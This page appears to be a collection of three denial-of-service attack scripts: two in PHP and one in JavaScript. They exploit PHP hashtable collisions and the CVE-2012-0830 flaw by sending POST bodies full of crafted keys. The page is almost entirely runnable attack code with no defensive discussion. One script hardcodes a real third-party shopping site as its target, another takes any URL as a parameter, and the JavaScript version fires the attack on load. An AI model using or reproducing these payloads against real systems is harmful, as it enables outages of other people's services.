Hash DDos

hash_ddos.php

?php
 
$url = isset($_GET['url']) ? trim($_GET['url']) : '';
if (empty($url)) {
    echo "_GET['url'] is empty\n";
    exit;
}
//echo $url, "\n";exit;
$magic_num = pow(2, 16);
$post_vars = array();
for ($key = 0, $maxKey = 70000 * $magic_num; $key <= $maxKey; $key += $magic_num) {
    $post_vars[] = "{$key}=1";
}
 
$ch = curl_init();
curl_setopt($ch, URLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, implode('&', $post_vars));
$data = curl_exec($ch);
curl_close($ch);

续

http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

hash_ddos_bug.php

<?php
 
function createEvilObj() {
    $arr = array();
    for ($i = 0; $i < 1001; $i++) {
        $arr[$i] = 1;
    }
    $arr['kill[]'] = 'kill';
    return $arr;
}
 
function serializeObj($evilObj) {
    $str_arr = array();
    foreach($evilObj as $_k=>$_v) {
        $str_arr[] = $_k . '=' . $_v;
    }
    return implode('&', $str_arr);
}
 
 
$url = "http://book.dangdang.com/index.php";
 
$ch = curl_init();
curl_setopt($ch, URLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, serializeObj(createEvilObj()));
$data = curl_exec($ch);
curl_close($ch);

hash_ddos_bug.js

// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
 
// Generate 1000 normal keys and one array
function createEvilObj () {
    var evil_obj = {};
    for (var i = 0; i < 1001; i++) {
        evil_obj[i] = 1;
    }
    evil_obj['kill[]'] = 'kill';
    return evil_obj;
}
 
// Serialize Javascript object into POST data
function serializeObj (obj) {
    var str = [];
    for(var p in obj) {
        str.push(p + "=" + obj[p]);
    }
    return str.join("&");
}
 
// Run attack
function attackSite () {
    var bad = serializeObj(createEvilObj());
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://www.YourDomain.com/", true);
    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    xhr.setRequestHeader('Content-Length', bad.length);
    xhr.send(bad);
}
 
attackSite();